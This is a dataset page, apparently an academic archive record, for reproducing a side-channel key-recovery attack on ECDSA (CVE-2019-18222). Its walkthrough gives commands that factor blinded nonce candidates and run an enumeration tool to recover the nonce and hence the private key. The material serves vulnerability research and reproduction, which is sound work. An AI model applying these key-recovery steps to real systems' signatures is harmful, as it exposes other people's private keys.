Dataset Open Access

CVE-2019-18222: research data and tooling

Alejandro Cabrera Aldaya; Billy Bob Brumley

Dublin Core Export

<?xml version='1.0' encoding='utf-8'?>
<oai_dc:dc xmlns:dc="" xmlns:oai_dc="" xmlns:xsi="" xsi:schemaLocation="">
  <dc:creator>Alejandro Cabrera Aldaya</dc:creator>
  <dc:creator>Billy Bob Brumley</dc:creator>
  <dc:description>This dataset and software tool are for reproducing the research results related to CVE-2019-18222.


	enum contains the key enumeration tool.
	kt_candidates contains the JSON for blinded nonce candidates, indexed by trial number. JSON fields:

	kt_candidates: list of nonce candidates.

	sig_data contains the JSON for ECDSA signatures, index by trial number. JSON fields:

	p: the prime the curve is defined over. (P-256 here.)
	Gx, Gy: Generator coordinates.
	d: Ground truth ECDSA long term key.
	Px, Py: Public key coordinates.
	h: SHA-256 digest to sign, encoded to the finite field.
	k: Ground truth ECDSA nonce.
	r, s: ECDSA signature.


cd enum
make clean


Start with enum as the working directory.

cd enum

Pull out a kt candidate, in this example index 847.

$ jq '.kt_candidates' ../kt_candidates/kt_candidates_847.json

Factor that candidate.

$ time sage -c "print ecm.factor(0x48ad7217d10f6c7b1a3db836d38aa3972999115f38a6b3d176fc660941aa5c882d2528ec1fc27da7610e7ee3d7dd84367c380259e0386224c2c46aa2a5eb2a0)"
[2, 2, 2, 2, 2, 3, 353, 193243, 1540830719, 9263081209, 103633959617085683, 151389566295160172521, 283135469779419532841, 572987990320782777757565685333349772719941819448953457732874126833]

real    0m5.837s
user    0m5.648s
sys 0m0.214s

Now pull out the r component of the ECDSA signature for that index, and convert it from hex to base 10.

$ jq '.r' ../sig_data/sig_data_847.json
$ python -c "print 0x30e2ce20a8140177a31a66763d85f431acc9790dd050ffc22ed5d454cdfbbb67"

Now run the enum tool to recover the nonce.

$ ./enum 
Usage: ./enum &lt;jobs_num&gt; &lt;jobs_id&gt; &lt;target_base_10&gt; space delimited flat list of factors in base ten

The &lt;jobs_num&gt; and &lt;jobs_id&gt; arguments are to ease parallel execution; read the source code. But for a single core, pass them as 1 0.

$ ./enum 1 0 22111746808803128586382711090186612204136854333384650261207856620766542674791 2 2 2 2 2 3 353 193243 1540830719 9263081209 103633959617085683 151389566295160172521 2831354697794195
32841 572987990320782777757565685333349772719941819448953457732874126833

where 221..791 is the base-10 r component of the ECDSA signature, and 2 2 .. 572..833 is the full list of blinded nonce factors. In the output:

	INFO:target:&lt;hex&gt; is the hex form of base-10 target input (ECDSA r component).
	INFO:found:&lt;hex&gt; is the hex form of the recovered ECDSA nonce.
	INFO:tests:&lt;num&gt; is the number of tested nonce candidates (scalar multiplications).

We can see this successfully recovered the nonce (hence long term ECDSA private key) correctly:

$ jq '.k' ../sig_data/sig_data_847.json
  <dc:subject>side-channel analysis</dc:subject>
  <dc:subject>binary GCD</dc:subject>
  <dc:subject>modular inversion</dc:subject>
  <dc:subject>Intel SGX</dc:subject>
  <dc:title>CVE-2019-18222: research data and tooling</dc:title>
All versions This version
Views 186186
Downloads 1414
Data volume 18.1 MB18.1 MB
Unique views 164164
Unique downloads 1313


Cite as